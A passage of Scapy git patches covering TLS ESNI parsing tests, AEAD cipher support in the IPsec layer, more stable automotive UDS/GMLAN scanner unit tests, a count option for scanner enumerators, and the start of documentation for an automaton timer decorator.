- - -= TLS_Ext_EncryptedServerName(), basic instantiation -~ crypto_advanced - -esni = TLS_Ext_EncryptedServerName(key_exchange_group=29,encrypted_sni=clean(""" -ffce016e1301001d00209 12e86b776ee552a6bb1e2 c70d7b467770b19043223 7cc743a93091dce246235 -00208bc16fdcbbc7c8756 808c94f70464d68297975 f33be90e1a200633f5eb2 d4c6101249e073bff8337 -82e57e882519a53ef8bde 4c94a7878a2f8461aec57 802440007c7b2dab986d9 bc79257ce00ca6a998b1f -adb0114161069d364cceb ae8dab6c88151f297daea ecfd2e1a598a486e2efc9 561298f8dd5f35d184f0e -87768777d253e68952b73 0a24b342fde10df4f8e82 afdc2f10c2481634d9201 5d9d5e6a9566494735d9c -079115bdeb0cd019098d1 cf847c53ef4aac41560ca cdc7ce166399df5b0c0af 91d5be3f7d8224755aaa6 -046de52875f9ef9ac1537 27ce08019bc2648beb4b1 418cb4979ff7eaeedaec2 b156955084d5a480cb939 -fdc7f00e6cc6fc0f96752 76a9d607686c4d779d4bb 7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d -4eaf386acc17dea11e37a 09f63da3d059243b35f44 9e891255ac7b4f631509d 7060f -""")) -assert esni.key_exchange_group == 29 and esni.encrypted_sni==clean(""" -ffce016e1301001d00209 12e86b776ee552a6bb1e2 c70d7b467770b19043223 7cc743a93091dce246235 -00208bc16fdcbbc7c8756 808c94f70464d68297975 f33be90e1a200633f5eb2 d4c6101249e073bff8337 -82e57e882519a53ef8bde 4c94a7878a2f8461aec57 802440007c7b2dab986d9 bc79257ce00ca6a998b1f -adb0114161069d364cceb ae8dab6c88151f297daea ecfd2e1a598a486e2efc9 561298f8dd5f35d184f0e -87768777d253e68952b73 0a24b342fde10df4f8e82 afdc2f10c2481634d9201 5d9d5e6a9566494735d9c -079115bdeb0cd019098d1 cf847c53ef4aac41560ca cdc7ce166399df5b0c0af 91d5be3f7d8224755aaa6 -046de52875f9ef9ac1537 27ce08019bc2648beb4b1 418cb4979ff7eaeedaec2 b156955084d5a480cb939 -fdc7f00e6cc6fc0f96752 76a9d607686c4d779d4bb 7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d -4eaf386acc17dea11e37a 09f63da3d059243b35f44 9e891255ac7b4f631509d 7060f -""") - = Decrypt a TLS 1.3 session - Decrypt and parse server Application Data ~ crypto_advanced # Values from RFC8448, section 3 @@ -1180,3 +1130,55 @@ m = t.inner.msg[0] assert(isinstance(m, TLSAlert)) assert(m.level == 1) assert(m.descr == 0) + +# --- Misc + += TLS_Ext_EncryptedServerName(), dissect +~ crypto_advanced + +from scapy.layers.tls.extensions import TLS_Ext_EncryptedServerName + +clientHello3 = clean(""" +16030102c4010002c003034b1 40e7d15fc8db422cec056fbaf 0285d306df4eedad1bc6ea57d 5114e6bd52a20a5b9c7445955 e296b886469c974648cda0a68 +5d3c06d884e388f6475c32e03 2d0024130113031302c02bc02 fcca9cca8c02cc030c00ac009 c013c01400330039002f00350 00a0100025300170000ff0100 +0100000a000e000c001d00170 018001901000101000b000201 00002300000010000b0009086 87474702f312e310005000501 000000000033006b0069001d0 +02037adee0aacc37b08d47222 caf6a5097a800fcf8406ae118 38f6348294d2dde1200170041 048b127c905d6d487a40b8b19 c99c56aa1a8c208218c178dae +02568547b2ce8f538a530b858 a7a2f608d66e148baa5693d03 c519b45017c63f48c5a4c1238 707bc002b0009080304030303 020301000d001800160403050 +3060308040805080604010501 060102030201002d00020101f fce016e1301001d0020912e86 b776ee552a6bb1e2c70d7b467 770b190432237cc743a93091d +ce24623500208bc16fdcbbc7c 8756808c94f70464d68297975 f33be90e1a200633f5eb2d4c6 101249e073bff833782e57e88 2519a53ef8bde4c94a7878a2f +8461aec57802440007c7b2dab 986d9bc79257ce00ca6a998b1 fadb0114161069d364ccebae8 dab6c88151f297daeaecfd2e1 a598a486e2efc9561298f8dd5 +f35d184f0e87768777d253e68 952b730a24b342fde10df4f8e 82afdc2f10c2481634d92015d 9d5e6a9566494735d9c079115 bdeb0cd019098d1cf847c53ef +4aac41560cacdc7ce166399df 5b0c0af91d5be3f7d8224755a aa6046de52875f9ef9ac15372 7ce08019bc2648beb4b1418cb 4979ff7eaeedaec2b15695508 +4d5a480cb939fdc7f00e6cc6f c0f9675276a9d607686c4d779 d4bb7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d4eaf 386acc17dea11e37a09f63da3 +d059243b35f449e891255ac7b 4f631509d7060f001c0002400 1 +""") +t = TLS(clientHello3) +clientESNI = t.msg[0].ext[11] +assert isinstance(clientESNI, TLS_Ext_EncryptedServerName) and clientESNI.cipher == 4865 + + += TLS_Ext_EncryptedServerName(), basic instantiation +~ crypto_advanced + +esni = TLS_Ext_EncryptedServerName(key_exchange_group=29,encrypted_sni=clean(""" +ffce016e1301001d00209 12e86b776ee552a6bb1e2 c70d7b467770b19043223 7cc743a93091dce246235 +00208bc16fdcbbc7c8756 808c94f70464d68297975 f33be90e1a200633f5eb2 d4c6101249e073bff8337 +82e57e882519a53ef8bde 4c94a7878a2f8461aec57 802440007c7b2dab986d9 bc79257ce00ca6a998b1f +adb0114161069d364cceb ae8dab6c88151f297daea ecfd2e1a598a486e2efc9 561298f8dd5f35d184f0e +87768777d253e68952b73 0a24b342fde10df4f8e82 afdc2f10c2481634d9201 5d9d5e6a9566494735d9c +079115bdeb0cd019098d1 cf847c53ef4aac41560ca cdc7ce166399df5b0c0af 91d5be3f7d8224755aaa6 +046de52875f9ef9ac1537 27ce08019bc2648beb4b1 418cb4979ff7eaeedaec2 b156955084d5a480cb939 +fdc7f00e6cc6fc0f96752 76a9d607686c4d779d4bb 7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d +4eaf386acc17dea11e37a 09f63da3d059243b35f44 9e891255ac7b4f631509d 7060f +""")) +assert esni.key_exchange_group == 29 and esni.encrypted_sni==clean(""" +ffce016e1301001d00209 12e86b776ee552a6bb1e2 c70d7b467770b19043223 7cc743a93091dce246235 +00208bc16fdcbbc7c8756 808c94f70464d68297975 f33be90e1a200633f5eb2 d4c6101249e073bff8337 +82e57e882519a53ef8bde 4c94a7878a2f8461aec57 802440007c7b2dab986d9 bc79257ce00ca6a998b1f +adb0114161069d364cceb ae8dab6c88151f297daea ecfd2e1a598a486e2efc9 561298f8dd5f35d184f0e +87768777d253e68952b73 0a24b342fde10df4f8e82 afdc2f10c2481634d9201 5d9d5e6a9566494735d9c +079115bdeb0cd019098d1 cf847c53ef4aac41560ca cdc7ce166399df5b0c0af 91d5be3f7d8224755aaa6 +046de52875f9ef9ac1537 27ce08019bc2648beb4b1 418cb4979ff7eaeedaec2 b156955084d5a480cb939 +fdc7f00e6cc6fc0f96752 76a9d607686c4d779d4bb 7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d +4eaf386acc17dea11e37a 09f63da3d059243b35f44 9e891255ac7b4f631509d 7060f +""") From 2c1747fea4432ee591646ab99d1fbe5caf3aee1a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 18 Jun 2022 22:46:46 +0200 Subject: [PATCH 0819/1632] Fix IPsec bugs & tests --- scapy/layers/ipsec.py | 125 ++++++++++++++++++++++--------- test/scapy/layers/ipsec.uts | 10 ++- test/tls/tests_tls_netaccess.uts | 2 +- 3 files changed, 95 insertions(+), 42 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 36035b4acac..7d292ad422f 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -170,6 +170,7 @@ def data_for_encryption(self): from cryptography.exceptions import InvalidTag from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.ciphers import ( + aead, Cipher, algorithms, modes, @@ -225,11 +226,18 @@ def __init__(self, name, cipher, mode, block_size=None, iv_size=None, self.mode = mode self.icv_size = icv_size - if modes and self.mode is not None: - self.is_aead = issubclass(self.mode, - modes.ModeWithAuthenticationTag) - else: - self.is_aead = False + self.is_aead = False + # If using cryptography.hazmat.primitives.cipher.aead + self.ciphers_aead_api = False + + if modes: + if self.mode is not None: + self.is_aead = issubclass(self.mode, + modes.ModeWithAuthenticationTag) + elif self.cipher in (aead.AESGCM, aead.AESCCM, + aead.ChaCha20Poly1305): + self.is_aead = True + self.ciphers_aead_api = True if block_size is not None: self.block_size = block_size @@ -339,36 +347,49 @@ def pad(self, esp): return esp - def encrypt(self, sa, esp, key, esn_en=False, esn=0): + def encrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): """ Encrypt an ESP packet :param sa: the SecurityAssociation associated with the ESP packet. :param esp: an unencrypted _ESPPlain packet with valid padding :param key: the secret key used for encryption + :param icv_size: the length of the icv used for integrity check :esn_en: extended sequence number enable which allows to use 64-bit sequence number instead of 32-bit when using an AEAD algorithm :esn: extended sequence number (32 MSB) :return: a valid ESP packet encrypted with this algorithm """ + if icv_size is None: + icv_size = self.icv_size if self.is_aead else 0 data = esp.data_for_encryption() if self.cipher: mode_iv = self._format_mode_iv(algo=self, sa=sa, iv=esp.iv) - cipher = self.new_cipher(key, mode_iv) - encryptor = cipher.encryptor() - + aad = None if self.is_aead: if esn_en: aad = struct.pack('!LLL', esp.spi, esn, esp.seq) else: aad = struct.pack('!LL', esp.spi, esp.seq) - encryptor.authenticate_additional_data(aad) - data = encryptor.update(data) + encryptor.finalize() - data += encryptor.tag[:self.icv_size] + if self.ciphers_aead_api: + # New API + if self.cipher == aead.AESCCM: + cipher = self.cipher(key, tag_length=icv_size) + else: + cipher = self.cipher(key) + data = cipher.encrypt(mode_iv, data, aad) else: - data = encryptor.update(data) + encryptor.finalize() + cipher = self.new_cipher(key, mode_iv) + encryptor = cipher.encryptor() + + if self.is_aead: + encryptor.authenticate_additional_data(aad) + data = encryptor.update(data) + encryptor.finalize() + data += encryptor.tag[:icv_size] + else: + data = encryptor.update(data) + encryptor.finalize() return ESP(spi=esp.spi, seq=esp.seq, data=esp.iv + data) @@ -397,21 +418,33 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): if self.cipher: mode_iv = self._format_mode_iv(sa=sa, iv=iv) - cipher = self.new_cipher(key, mode_iv, icv) - decryptor = cipher.decryptor() - + aad = None if self.is_aead: - # Tag value check is done during the finalize method if esn_en: - decryptor.authenticate_additional_data( - struct.pack('!LLL', esp.spi, esn, esp.seq)) + aad = struct.pack('!LLL', esp.spi, esn, esp.seq) else: - decryptor.authenticate_additional_data( - struct.pack('!LL', esp.spi, esp.seq)) - try: - data = decryptor.update(data) + decryptor.finalize() - except InvalidTag as err: - raise IPSecIntegrityError(err) + aad = struct.pack('!LL', esp.spi, esp.seq) + if self.ciphers_aead_api: + # New API + if self.cipher == aead.AESCCM: + cipher = self.cipher(key, tag_length=icv_size) + else: + cipher = self.cipher(key) + try: + data = cipher.decrypt(mode_iv, data + icv, aad) + except InvalidTag as err: + raise IPSecIntegrityError(err) + else: + cipher = self.new_cipher(key, mode_iv, icv) + decryptor = cipher.decryptor() + + if self.is_aead: + # Tag value check is done during the finalize method + decryptor.authenticate_additional_data(aad) + try: + data = decryptor.update(data) + decryptor.finalize() + except InvalidTag as err: + raise IPSecIntegrityError(err) # extract padlen and nh padlen = orb(data[-2]) @@ -453,22 +486,33 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): format_mode_iv=_aes_ctr_format_mode_iv) _salt_format_mode_iv = lambda sa, iv, **kw: sa.crypt_salt + iv CRYPT_ALGOS['AES-GCM'] = CryptAlgo('AES-GCM', - cipher=algorithms.AES, - mode=modes.GCM, + cipher=aead.AESGCM, + key_size=(16, 24, 32), + mode=None, salt_size=4, block_size=1, iv_size=8, icv_size=16, format_mode_iv=_salt_format_mode_iv) - if hasattr(modes, 'CCM'): - CRYPT_ALGOS['AES-CCM'] = CryptAlgo('AES-CCM', - cipher=algorithms.AES, - mode=modes.CCM, - block_size=1, - iv_size=8, - salt_size=3, - icv_size=16, - format_mode_iv=_salt_format_mode_iv) + CRYPT_ALGOS['AES-CCM'] = CryptAlgo('AES-CCM', + cipher=aead.AESCCM, + mode=None, + key_size=(16, 24, 32), + block_size=1, + iv_size=8, + salt_size=3, + icv_size=16, + format_mode_iv=_salt_format_mode_iv) + CRYPT_ALGOS['CHACHA20-POLY1305'] = CryptAlgo('CHACHA20-POLY1305', + cipher=aead.ChaCha20Poly1305, + mode=None, + key_size=32, + block_size=1, + iv_size=8, + salt_size=4, + icv_size=16, + format_mode_iv=_salt_format_mode_iv) # noqa: E501 + # XXX: RFC7321 states that DES *MUST NOT* be implemented. # XXX: Keep for backward compatibility? # Using a TripleDES cipher algorithm for DES is done by using the same 64 @@ -822,7 +866,9 @@ class SecurityAssociation(object): SUPPORTED_PROTOS = (IP, IPv6) def __init__(self, proto, spi, seq_num=1, crypt_algo=None, crypt_key=None, - auth_algo=None, auth_key=None, tunnel_header=None, nat_t_header=None, esn_en=False, esn=0): # noqa: E501 + crypt_icv_size=None, + auth_algo=None, auth_key=None, + tunnel_header=None, nat_t_header=None, esn_en=False, esn=0): """ :param proto: the IPsec proto to use (ESP or AH) :param spi: the Security Parameters Index of this SA @@ -830,6 +876,8 @@ def __init__(self, proto, spi, seq_num=1, crypt_algo=None, crypt_key=None, packets :param crypt_algo: the encryption algorithm name (only used with ESP) :param crypt_key: the encryption key (only used with ESP) + :param crypt_icv_size: change the default size of the crypt_algo + (only used with ESP) :param auth_algo: the integrity algorithm name :param auth_key: the integrity key :param tunnel_header: an instance of a IP(v6) header that will be used @@ -872,6 +920,7 @@ def __init__(self, proto, spi, seq_num=1, crypt_algo=None, crypt_key=None, self.crypt_algo = CRYPT_ALGOS['NULL'] self.crypt_key = None self.crypt_salt = None + self.crypt_icv_size = crypt_icv_size if auth_algo: if auth_algo not in AUTH_ALGOS: @@ -928,6 +977,7 @@ def _encrypt_esp(self, pkt, seq_num=None, iv=None, esn_en=None, esn=None): esp = self.crypt_algo.pad(esp) esp = self.crypt_algo.encrypt(self, esp, self.crypt_key, + self.crypt_icv_size, esn_en=esn_en or self.esn_en, esn=esn or self.esn) @@ -1046,6 +1096,7 @@ def _decrypt_esp(self, pkt, verify=True, esn_en=None, esn=None): self.auth_algo.verify(encrypted, self.auth_key) esp = self.crypt_algo.decrypt(self, encrypted, self.crypt_key, + self.crypt_icv_size or self.crypt_algo.icv_size or self.auth_algo.icv_size, esn_en=esn_en or self.esn_en, diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index 9b139f3b5dd..b2c4ded6d11 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -1695,6 +1695,7 @@ p sa = SecurityAssociation(ESP, spi=0x222, crypt_algo='AES-CCM', crypt_key=b'16bytekey3bytenonce', + crypt_icv_size=8, auth_algo='NULL', auth_key=None) e = sa.encrypt(p) @@ -1702,7 +1703,7 @@ e assert(isinstance(e, IP)) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') +assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') assert(e.chksum != p.chksum) assert(e.proto == socket.IPPROTO_ESP) assert(e.haslayer(ESP)) @@ -1749,7 +1750,8 @@ p sa = SecurityAssociation(ESP, spi=0x222, crypt_algo='AES-CCM', crypt_key=b'16bytekey3bytenonce', - auth_algo='NULL', auth_key=None) + auth_algo='NULL', auth_key=None, + tunnel_header=IP(src='11.11.11.11', dst='22.22.22.22')) e = sa.encrypt(p) e @@ -3720,7 +3722,7 @@ e = sa.encrypt(p) e assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') +assert(e.src == 'aa::bb' and e.dst == 'bb::aa') assert(e.nh == socket.IPPROTO_ESP) assert(e.haslayer(ESP)) assert(not e.haslayer(TCP)) @@ -3753,7 +3755,7 @@ e = sa.encrypt(p) e assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') +assert(e.src == 'aa::bb' and e.dst == 'bb::aa') assert(e.nh == socket.IPPROTO_ESP) assert(e.haslayer(ESP)) assert(not e.haslayer(TCP)) diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index f447a9b5b53..834cfbf131a 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -343,7 +343,7 @@ test_tls_client("1305", "0304", client_auth=True) test_tls_client("1305", "0304", key_update=True) = Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 and session resumption -~ crypto_advanced +~ crypto_advanced not_pypy test_tls_client("1305", "0304", client_auth=True, sess_in_out=True) From f549b66f3f523c1c1a4a21aadc40c6153c5ad77e Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 21 Jun 2022 22:39:32 +0200 Subject: [PATCH 0820/1632] Stabilize UDS_Scanner unit tests for appveyor (#3615) * Different approach * add event * fix test * cleanup * cleanup * lower timeout of GMLAN Scanner * apply feedback --- .../contrib/automotive/scanner/enumerator.py | 28 ++++++++-------- scapy/contrib/automotive/scanner/executor.py | 22 +++++++------ test/contrib/automotive/gm/scanner.uts | 32 +++++++++++++++---- .../automotive/scanner/uds_scanner.uts | 31 ++++++++++++++---- 4 files changed, 76 insertions(+), 37 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index dd111e37033..54a584e1341 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -106,7 +106,7 @@ class ServiceEnumerator(AutomotiveTestCase): def __init__(self): # type: () -> None super(ServiceEnumerator, self).__init__() - self.__result_packets = OrderedDict() # type: Dict[bytes, Packet] + self._result_packets = OrderedDict() # type: Dict[bytes, Packet] self._results = list() # type: List[_AutomotiveTestCaseScanResult] self._request_iterators = dict() # type: Dict[EcuState, Iterable[Packet]] # noqa: E501 self._retry_pkt = defaultdict(lambda: None) # type: Dict[EcuState, Optional[Union[Packet, Iterable[Packet]]]] # noqa: E501 @@ -190,20 +190,20 @@ def completed(self): def _store_result(self, state, req, res): # type: (EcuState, Packet, Optional[Packet]) -> None - if bytes(req) not in self.__result_packets: - self.__result_packets[bytes(req)] = req + if bytes(req) not in self._result_packets: + self._result_packets[bytes(req)] = req - if res and bytes(res) not in self.__result_packets: - self.__result_packets[bytes(res)] = res + if res and bytes(res) not in self._result_packets: + self._result_packets[bytes(res)] = res self._results.append(_AutomotiveTestCaseScanResult( state, - self.__result_packets[bytes(req)], - self.__result_packets[bytes(res)] if res is not None else None, + self._result_packets[bytes(req)], + self._result_packets[bytes(res)] if res is not None else None, req.sent_time or 0.0, res.time if res is not None else None)) - def __get_retry_iterator(self, state): + def _get_retry_iterator(self, state): # type: (EcuState) -> Iterable[Packet] retry_entry = self._retry_pkt[state] if retry_entry is None: @@ -216,7 +216,7 @@ def __get_retry_iterator(self, state): # assume self.retry_pkt is a generator or list return retry_entry - def __get_initial_request_iterator(self, state, **kwargs): + def _get_initial_request_iterator(self, state, **kwargs): # type: (EcuState, Any) -> Iterable[Packet] if state not in self._request_iterators: self._request_iterators[state] = iter( @@ -224,10 +224,10 @@ def __get_initial_request_iterator(self, state, **kwargs): return self._request_iterators[state] - def __get_request_iterator(self, state, **kwargs): + def _get_request_iterator(self, state, **kwargs): # type: (EcuState, Optional[Dict[str, Any]]) -> Iterable[Packet] - return chain(self.__get_retry_iterator(state), - self.__get_initial_request_iterator(state, **kwargs)) + return chain(self._get_retry_iterator(state), + self._get_initial_request_iterator(state, **kwargs)) def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None @@ -250,7 +250,7 @@ def execute(self, socket, state, **kwargs): repr(state)) return - it = self.__get_request_iterator(state, **kwargs) + it = self._get_request_iterator(state, **kwargs) # log_interactive.debug("[i] Using iterator %s in state %s", it, state) @@ -657,7 +657,7 @@ def _get_label(self, response, positive_case="PR: PositiveResponse"): def supported_responses(self): # type: () -> List[EcuResponse] supported_resps = list() - all_responses = [p for p in self.__result_packets.values() + all_responses = [p for p in self._result_packets.values() if orb(bytes(p)[0]) & 0x40] for resp in all_responses: states = list(set([t.state for t in self.results_with_response diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 5c84cae838a..fdfa71e68fc 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -73,9 +73,6 @@ def __init__( self.configuration = AutomotiveTestCaseExecutorConfiguration( test_cases or self.default_test_case_clss, **kwargs) - self.configuration.state_graph.add_edge( - (self.__initial_ecu_state, self.__initial_ecu_state)) - def __reduce__(self): # type: ignore f, t, d = super(AutomotiveTestCaseExecutor, self).__reduce__() # type: ignore # noqa: E501 try: @@ -186,19 +183,26 @@ def execute_test_case(self, test_case): test_case.post_execute( self.socket, self.target_state, self.configuration) - if isinstance(test_case, StateGenerator): - edge = test_case.get_new_edge(self.socket, self.configuration) - if edge: - log_interactive.debug("Edge found %s", edge) - tf = test_case.get_transition_function(self.socket, edge) - self.state_graph.add_edge(edge, tf) + self.check_new_states(test_case) + self.check_new_testcases(test_case) + def check_new_testcases(self, test_case): + # type: (AutomotiveTestCaseABC) -> None if isinstance(test_case, TestCaseGenerator): new_test_case = test_case.get_generated_test_case() if new_test_case: log_interactive.debug("Testcase generated %s", new_test_case) self.configuration.add_test_case(new_test_case) + def check_new_states(self, test_case): + # type: (AutomotiveTestCaseABC) -> None + if isinstance(test_case, StateGenerator): + edge = test_case.get_new_edge(self.socket, self.configuration) + if edge: + log_interactive.debug("Edge found %s", edge) + tf = test_case.get_transition_function(self.socket, edge) + self.state_graph.add_edge(edge, tf) + def scan(self, timeout=None): # type: (Optional[int]) -> None """ diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 73fbc05359e..3b3ba7dc3d3 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -6,7 +6,6 @@ = Imports import itertools -import threading from scapy.contrib.isotp import ISOTPMessageBuilder from test.testsocket import TestSocket, cleanup_testsockets @@ -28,22 +27,41 @@ load_layer("can") = Define Testfunction def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwargs): - ecu = TestSocket(GMLAN) tester = TestSocket(GMLAN) - ecu.pair(tester) - answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) + answering_machine_started = threading.Event() + answering_machine_running = threading.Event() + answering_machine_running.set() def reset(): answering_machine.reset_state() sniff(timeout=0.001, opened_socket=[ecu, tester]) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) + def answering_machine_thread(): + global ecu + global answering_machine + while answering_machine_running.is_set(): + try: + ecu = TestSocket(GMLAN) + tester.pair(ecu) + answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) + answering_machine_started.set() + answering_machine(timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") + return + except OSError: + continue + sim = threading.Thread(target=answering_machine_thread) sim.start() + answering_machine_started.wait(timeout=10) try: scanner = GMLAN_Scanner( tester, reset_handler=reset, - test_cases=enumerators, timeout=0.5, retry_if_none_received=True, + test_cases=enumerators, timeout=0.2, retry_if_none_received=True, unittest=True, **kwargs) - scanner.scan(timeout=200) + for i in range(100): + scanner.scan(timeout=10) + if scanner.scan_completed: + print("Scan completed after %d iterations" % i) + break finally: + answering_machine_running.clear() tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) assert not sim.is_alive() diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 54bd5499db1..63cc9cba732 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -20,6 +20,7 @@ from scapy.contrib.automotive.uds import * from scapy.contrib.automotive.uds_ecu_states import * from scapy.contrib.automotive.uds_scan import * from scapy.contrib.automotive.ecu import * + load_layer("can") @@ -27,31 +28,46 @@ load_layer("can") def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstable_socket=True, **kwargs): TesterSocket = UnstableSocket if unstable_socket else TestSocket - ecu = TestSocket(UDS) - tester = TesterSocket(UDS) + answering_machine_started = threading.Event() + answering_machine_running = threading.Event() + answering_machine_running.set() def reset(): answering_machine.state.reset() answering_machine.state["session"] = 1 sniff(timeout=0.001, opened_socket=[ecu, tester]) def reconnect(): + global tester tester = TesterSocket(UDS) ecu.pair(tester) return tester - ecu.pair(tester) - answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) + def answering_machine_thread(): + global ecu + global answering_machine + while answering_machine_running.is_set(): + try: + ecu = TestSocket(UDS) + tester.pair(ecu) + answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) + answering_machine_started.set() + answering_machine(timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") + return + except OSError: + continue + sim = threading.Thread(target=answering_machine_thread) sim.start() + answering_machine_started.wait(timeout=10) try: scanner = UDS_Scanner( - tester, reset_handler=reset, reconnect_handler=reconnect, test_cases=enumerators, timeout=0.1, + reconnect(), reset_handler=reset, reconnect_handler=reconnect, test_cases=enumerators, timeout=0.1, retry_if_none_received=True, unittest=True, **kwargs) for i in range(100): - scanner.scan(timeout=20) + scanner.scan(timeout=10) if scanner.scan_completed: print("Scan completed after %d iterations" % i) break finally: + answering_machine_running.clear() tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) if six.PY3 and LINUX: @@ -162,6 +178,7 @@ scanner = executeScannerInVirtualEnvironment( 0x3D, 0x3E, 0x83, 0x84, 0x85, 0x87]}) +scanner.show_testcases() assert len(scanner.state_paths) == 5 assert scanner.scan_completed From 0b030308134905fd9eb5f9064484e48f5312b227 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 23 Jun 2022 18:37:20 +0200 Subject: [PATCH 0821/1632] Add count parameter to enumerators in automotive scanners (#3658) --- scapy/contrib/automotive/scanner/enumerator.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 54a584e1341..7c579fcb072 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -69,6 +69,7 @@ class ServiceEnumerator(AutomotiveTestCase): _supported_kwargs_doc = AutomotiveTestCase._supported_kwargs_doc + """ :param timeout: Timeout until a response will arrive after a request :type timeout: integer or float + :param integer count: Number of request to be sent in one execution :param int execution_time: Time in seconds until the execution of this enumerator is stopped. :param state_allow_list: List of EcuState objects or EcuState object @@ -233,6 +234,7 @@ def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None self.check_kwargs(kwargs) timeout = kwargs.pop('timeout', 1) + count = kwargs.pop('count', None) execution_time = kwargs.pop("execution_time", 1200) state_block_list = kwargs.get('state_block_list', list()) @@ -268,6 +270,14 @@ def execute(self, socket, state, **kwargs): "of response evaluation") return + if count is not None: + if count <= 0: + log_interactive.debug( + "[i] Finished execution count of enumerator") + return + else: + count -= 1 + if (start_time + execution_time) < time.time(): log_interactive.debug( "[i] Finished execution time of enumerator: %s", From 3117426183de8db440ac375312686f01ce12347d Mon Sep 17 00:00:00 2001 From: "Matsievskiy S.V" Date: Fri, 24 Jun 2022 12:42:14 +0300 Subject: [PATCH 0822/1632] ATMT: Add timer with autoreset (#3636) * Add ATMT.timer decorator for timers with autoreset * Allow passing Timer objects to ATMT.timer and ATMT.timeout in order to modify timeouts at runtime Co-authored-by: Matsievskiy S.V --- doc/scapy/advanced_usage.rst | 25 ++++- scapy/automaton.py | 196 +++++++++++++++++++++++++++++------ test/scapy/automaton.uts | 85 +++++++++++++-- 3 files changed, 268 insertions(+), 38 deletions(-) diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index 3a451b1f9f1..f42382fba2c 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -723,7 +723,7 @@ The ``START`` event is ``initial=1``, the ``STOP`` event is ``stop=1`` and the ` Decorators for transitions ~~~~~~~~~~~~~~~~~~~~~~~~~~ -Transitions are methods decorated by the result of one of ``ATMT.condition``, ``ATMT.receive_condition``, ``ATMT.timeout``. They all take as argument the state method they are related to. ``ATMT.timeout`` also have a mandatory ``timeout`` parameter to provide the timeout value in seconds. ``ATMT.condition`` and ``ATMT.receive_condition`` have an optional ``prio`` parameter so that the order in which conditions are evaluated can be forced. The default priority is 0. Transitions with the same priority level are called in an undetermined order. +Transitions are methods decorated by the result of one of ``ATMT.condition``, ``ATMT.receive_condition``, ``ATMT.timeout``, ``ATMT.timer``. They all take as argument the state method they are related to. ``ATMT.timeout`` and ``ATMT.timer`` also have a mandatory ``timeout`` parameter to provide the timeout value in seconds. The difference between ``ATMT.timeout`` and ``ATMT.timer`` is that ``ATMT.timeout`` gets triggered only once. ``ATMT.timer`` get reloaded automatically, which is useful for sending keep-alive packets. ``ATMT.condition`` and ``ATMT.receive_condition`` have an optional ``prio`` parameter so that the order in which conditions are evaluated can be forced. The default priority is 0. Transitions with the same priority level are called in an undetermined order. When the automaton switches to a given state, the state's method is executed. Then transitions methods are called at specific moments until one triggers a new state (something like ``raise self.MY_NEW_STATE()``). First, right after the state's method returns, the 